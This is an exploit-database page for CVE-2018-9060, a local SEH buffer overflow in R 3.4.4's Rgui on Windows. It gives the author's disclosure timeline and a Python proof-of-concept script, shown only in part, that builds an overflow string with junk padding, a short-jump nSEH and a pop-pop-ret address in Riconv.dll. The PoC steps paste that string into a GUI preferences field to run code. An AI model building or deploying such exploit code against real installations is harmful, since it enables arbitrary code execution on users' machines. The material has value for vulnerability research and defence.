Rgui 3.4.4 local buffer overflow Vulnerability / Exploit
Exploits / Vulnerability Discovered: 2018-04-24
Type: local
Platform: windows
This exploit / vulnerability, Rgui 3.4.4 local buffer overflow, is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
#!/usr/bin/python
#
# Exploit Author: bzyo
# CVE: CVE-2018-9060
# Twitter: @bzyo_
# Exploit Title: R 3.4.4 - Local Buffer Overflow
# Date: 03-27-2018
# Vulnerable Software: R 3.4.4
# Vendor Homepage: https://www.r-project.org/
# Version: 3.4.4
# Software Link: https://cloud.r-project.org/bin/windows/
# Tested On: Windows 7 x86
#
# Timeline:
# 03-27-18: Emailed author, no response
# 04-03-18: Emailed author, no response
# 04-10-18: Emailed author, no response
# 04-23-18: New version released; Submitted public disclosure
#
# lots of bad chars, use alpha_mixed
# badchars \x00\x0a\x0d\x0e and \x80 through \xbf
#
#
# PoC:
# 1. generate r344.txt, copy contents to clipboard
# 2. open app, select Edit, select 'GUI preferences'
# 3. paste r344.txt contents into 'Language for menus and messages'
# 4. select OK
# 5. pop calc
#
filename="r344.txt"
junk = "A"*900
#jump 6
nseh = "\xeb\x06\xcc\xcc"
#0x643c17af : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [Riconv.dll]
seh = "\xaf\x17\x3c\x64"